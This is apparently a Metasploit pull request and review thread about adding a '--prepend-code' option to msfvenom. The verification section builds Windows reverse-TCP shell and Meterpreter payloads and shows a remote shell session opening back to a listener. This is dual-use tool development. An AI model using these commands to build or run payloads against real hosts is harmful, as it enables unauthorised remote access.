### PR TITLE
Add the ability to prepend shellcode to a payload

### PR DESCRIPTION
**Pull request by bwatters-r7**
This PR is the result of a brain worm that would otherwise have consumed me this weekend and is my quick attempt at getting it out as code for an option to the solution prosed in https://github.com/rapid7/metasploit-framework/pull/16425

I think it will only work on Windows, and it does not work on `generate` in framework right now.... It might be better to use something like `Prepend` in framework, but framework's `generate` options was a bit too big a rabbit hole to fall in on a Friday afternoon.....

## Verification
The use-case here is super specific so the test case is both contrived and incomplete.

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use use payload/windows/x64/shell_reverse_tcp`
- [ ] `set lhost <lhost>`
- [ ] `set lport <lport>`
- [ ] `generate -f raw -o <shellcode_filename>`
- [ ] `to_handler`
 
 In another window
- [ ] `./msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -o '<exe_filename>' --prepend-code '<shellcode_filename>' LHOST=<does_not_matter> LPORT=<does_not_matter>`

- [ ] Upload `<exe_payload>` to a windows host and run it
- [ ] **Verify** the prepended shellcode executes (you should get a callback to the shell session listener)

msfconsole:
```
msf6 payload(linux/aarch64/meterpreter/reverse_tcp) > use payload/windows/x64/shell_reverse_tcp 
msf6 payload(windows/x64/shell_reverse_tcp) > set lhost 10.5.135.101
lhost => 10.5.135.101
msf6 payload(windows/x64/shell_reverse_tcp) > set lport 4568
lport => 4568
msf6 payload(windows/x64/shell_reverse_tcp) > show options

Module options (payload/windows/x64/shell_reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.101     yes       The listen address (an interface may be specified)
   LPORT     4568             yes       The listen port

msf6 payload(windows/x64/shell_reverse_tcp) > generate -f raw -o <shellcode_file>
msf6 payload(windows/x64/shell_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 0
msf6 payload(windows/x64/shell_reverse_tcp) > 
[*] Started reverse TCP handler on 10.5.135.101:4568 
[*] Command shell session 1 opened (10.5.135.101:4568 -> 10.5.132.156:51087) at 2022-05-13 15:16:05 -0500
```

msfvenom:
```
./msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -o revtcpx64_meterp_4567.exe --prepend-code <shellcode_file> LHOST=10.5.135.101 LPORT=4565
```

### CODE REVIEW

**Comment by timwr** [comment]
I'm curious: Does exiting the first session then continue execution and execute the next <does not matter> shellcode, giving a session?

File: lib/msf/core/payload_generator.rb [hunk 1]
```diff
@@ -195,6 +199,24 @@ def add_shellcode(shellcode)
...
+      if prepend_code.present?
+        cli_print "Adding shellcode from #{prepend_code} to the beginning of the payload"
+        shellcode_file = File.open(prepend_code)
+        shellcode_file.binmode
+        added_code = shellcode_file.read
+        shellcode_file.close
+        added_code << shellcode
+      else
+        shellcode.dup
+      end
```
Comment (adfoster-r7) [inline lib/msf/core/payload_generator.rb:217]:
```suggestion
      return shellcode unless prepend_code.present?
      
      cli_print "Adding shellcode from #{prepend_code} to the beginning of the payload"
      File.binread(prepend_code) + shellcode
```

**Comment by jmartin-r7** [comment]
Interesting approach, this not quite what I had in mind during the team discussion but is a step in the direction.

One key item I think would help is the idea that the `prepend` component may be more usable if defined as a module/class like an `encoder` or the more recent payload `adapters`.  A `generic` initial module/class that accepts the `file` used here as an option, could then offer comparable function to this PR, and a module/class that offers the register setup in #16425 could be created that does not need the `file` and builds in the prepended instructions.  By using classes we gain the ability to define metadata about requirement for compatible `prepend` components that can be checked at generation time to validate compatibility whether they added segment be assembly or some other early mutation for the payload stage or stager.

File: msfvenom [hunk 2]
```diff
@@ -177,6 +177,10 @@ def parse_args(args)
     opts[:add_code] = x
   end
 
+  opt.on('-z', '--prepend-code        <path>', String, 'Specify shellcode file to append') do |x|
```
Comment (jmartin-r7) [inline msfvenom:180]: Why `-z`,  for the short flag? This does to have a clear logical connection to the longer form to me.

File: lib/msf/core/payload_generator.rb (hunk 1 above)
Comment (bwatters-r7) [reply lib/msf/core/payload_generator.rb:217]: @timwr no; we have the `add-shellcode` @adfoster-r7 shows that launches a second thread (but only for win32).  This was made just to run some prep code before the payload.

Comment (bwatters-r7) [reply lib/msf/core/payload_generator.rb:217]: @adfoster-r7 yup; I was trying to remember the exact method for binread, but I saw that the code block did exactly what I wanted, and this was just a discussion PR, so 🤷 .

File: msfvenom (hunk 2 above)
Comment (jmartin-r7) [reply msfvenom:180]: Maybe just support a long flag for initial pass and if we find high usages occurs promote to add a short flag when/if it makes sense.

**Comment by bwatters-r7** [comment]
OK....... I need some hive mind help.
We have several features that essentially prepend shellcode onto payloads, and it is spread around in different places.  The POSIX/mettle prepend stuff is stored in one place, and all relies on Advanced payload options:
```
   PrependChrootBreak
   PrependFork
   PrependSetgid
   PrependSetregid
   PrependSetresgid
   PrependSetresuid
   PrependSetreuid
   PrependSetuid
```
All these options are advanced datastore options and the code to implement them is in the lib/msf/core/payload/linux.rb file.  It is really quite heartwarming.  😍 

In contrast, the Windows side is less organized.
`PrependMigrate` adds shellcode that migrates the payload to another process and is available on windows payloads, and only supported by an advanced option.
`AddCode` adds shellcode to the payload that launches in a separate thread, and is only supported with Win32 and only available as a flag in msfvenom.
`Nopsled` adds a nopsled to the start of a payload, and is supported as a flag in venom and generate, but it is not a payload option.
`PrependShellcode` would be a mettle/windows feature

I feel like the way forward is to take the Windows prepends and package them just like the mettle prepends: as Advanced options.  Then, we could locate the code in a central place, and change the options if we wanted to support the command-line experience.
Also, I'm not entirely sure we want to continue supporting the AddCode feature, as it only supports Win32, but I'm happy migrating the code and leaving it as-is functionality-wise.  If we determine that there's a feature deficiency, we can always add the 64-bit shellcode in that mimics the behavior.

So TL;DR, I propose renaming the existing `lib/msf/core/payload/windows/prepend_migrate` to `lib/msf/core/payload/windows/prepend` then shift all the code for prepending to Windows payloads into it, registering each prepend as an option in that file.
Then, I'd replace the code in venom and the generator with changes to the options so that we just got the payload as expected, rather than bolting on shellcode after-the-fact.

One gotcha I forsee is that I think that the `prepend_shellcode` and `nopsled` here would nee to be located outside any encoding, but I think that's pretty dooable.
